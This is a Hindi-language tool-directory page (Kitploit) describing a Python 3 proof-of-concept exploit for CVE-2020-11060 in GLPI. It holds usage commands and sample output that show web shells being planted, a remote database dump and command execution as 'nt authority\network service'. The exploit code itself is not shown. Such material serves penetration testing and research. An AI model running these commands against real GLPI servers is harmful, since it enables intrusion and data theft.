Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2020-11060-poc — CVE 2020-11060 के लिए Python3 POC | Kitploit
उपकरण/GitHubGitHub/0xdreadnaught/cve-2020-11060-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHub0xdreadnaught/cve-2020-11060-poc

cve-2020-11060-poc

CVE 2020-11060 के लिए Python3 POC

रिपॉजिटरी देखें
812 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-11060

यह स्क्रिप्ट GLPI संस्करण 0.85-9.4.5 में CVE-2020-11060 के लिए Python 3.x आधारित एक शोषण है।

मूल कार्यान्वयन: 0xdreadnaught

Python3 पुनर्लेखन: n3rada

ExploitDB में मूल PoC अब अप्रचलित हो चुका है क्योंकि इसमें Python 2.x का उपयोग किया गया था। नया संस्करण प्रस्तुत किया जा चुका है, और स्वीकृत होने पर यहाँ एक लिंक जोड़ा जाएगा। इन PoCs को बनाने के लिए उपयोग किया गया मूल भेद्यता अनुसंधान AlmondOffSec द्वारा किया गया था, और इसे यहाँ पाया जा सकता है।

उपयोग

root@kitploit:~
python3 CVE-2020-11060.py --url 'http://<target URL>' --user <'user'> --password <'password'> --platform <win/nix> --offset <#>

उदाहरण आउटपुट

root@kitploit:~
python3 CVE-2020-11060.py --url 'http://glpi.vul.ne' --user 'glpi_adm' --password 'Amvfd6565/432' --platform 'win' --offset 312

[+] GLPI Browser 'http://glpi.vul.ne' ('windows') को निम्न क्रेडेंशियल्स के साथ लक्षित कर रहा है: 'glpi_adm':'Amvfd6565/432'।
[+] लक्ष्य चालू है और प्रतिक्रिया दे रहा है।
[+] उपयोगकर्ता 'glpi_adm' लॉग इन है।
------------------------- परीक्षण संख्या 1 -------------------------
[*] नेटवर्क मिटाए जा रहे हैं...
        नेटवर्क आईडी हटा रहा है: 2413
[+] नेटवर्क बनाया गया
[+] नेटवर्क संशोधित किया जा रहा है
        नया ESSID: RCEe
[+] वर्तमान शेल नाम: bQznfdTr.php
[*] डेटाबेस को दूरस्थ रूप से डंप किया जा रहा है: C:\xampp\htdocs\sound\bQznfdTr.php
[+] फ़ाइल 'डंप' की गई, इस पर उपलब्ध: http://glpi.vul.ne/sound/bQznfdTr.php
[+] शेल आकार: 265
------------------------- परीक्षण संख्या 2 -------------------------
[*] नेटवर्क मिटाए जा रहे हैं...
        नेटवर्क आईडी हटा रहा है: 2414
[+] नेटवर्क बनाया गया
[+] नेटवर्क संशोधित किया जा रहा है
        नया ESSID: RCEee
[+] वर्तमान शेल नाम: HdqrmKtR.php
[*] डेटाबेस को दूरस्थ रूप से डंप किया जा रहा है: C:\xampp\htdocs\sound\HdqrmKtR.php
[+] फ़ाइल 'डंप' की गई, इस पर उपलब्ध: http://glpi.vul.ne/sound/HdqrmKtR.php
[+] शेल आकार: 13882
------------------------- परीक्षण संख्या 3 -------------------------
[*] नेटवर्क मिटाए जा रहे हैं...
        नेटवर्क आईडी हटा रहा है: 2415
[+] नेटवर्क बनाया गया
[+] नेटवर्क संशोधित किया जा रहा है
        नया ESSID: RCEeee
[+] वर्तमान शेल नाम: dwmfIJgN.php
[*] डेटाबेस को दूरस्थ रूप से डंप किया जा रहा है: C:\xampp\htdocs\sound\dwmfIJgN.php
[+] फ़ाइल 'डंप' की गई, इस पर उपलब्ध: http://glpi.vul.ne/sound/dwmfIJgN.php
[+] शेल आकार: 13885
------------------------- परीक्षण संख्या 4 -------------------------
[*] नेटवर्क मिटाए जा रहे हैं...
        नेटवर्क आईडी हटा रहा है: 2416
[+] नेटवर्क बनाया गया
[+] नेटवर्क संशोधित किया जा रहा है
        नया ESSID: RCEeeee
[+] वर्तमान शेल नाम: KmGsYHBw.php
[*] डेटाबेस को दूरस्थ रूप से डंप किया जा रहा है: C:\xampp\htdocs\sound\KmGsYHBw.php
[+] फ़ाइल 'डंप' की गई, इस पर उपलब्ध: http://glpi.vul.ne/sound/KmGsYHBw.php
[+] शेल आकार: 8369
------------------------------------------------------------------
[+] 4 परीक्षणों के बाद RCE मिला!
[+] आप दूरस्थ रूप से कमांड निष्पादित कर सकते हैं: nt authority\network service@WIN03
[+] इंजेक्ट करने के लिए वांछित कमांड के साथ इस टूल को फिर से चलाएँ:
        python3 CVE-2020-11060.py --url 'http://glpi.vul.ne/sound/KmGsYHBw.php' --command 'desired_command_here'

उसके बाद, आप स्वतंत्र रूप से एक कमांड निष्पादित कर सकते हैं जैसे:

root@kitploit:~
python3 CVE-2020-11060.py --url 'http://glpi.vul.ne/sound/KmGsYHBw.php' --command 'whoami'

और यह वापस आएगा:

root@kitploit:~
[*] 'http://glpi.vul.ne/sound/KmGsYHBw.php' से प्रतिक्रिया प्राप्त हुई:

nt authority\network service
टूल डाउनलोड करें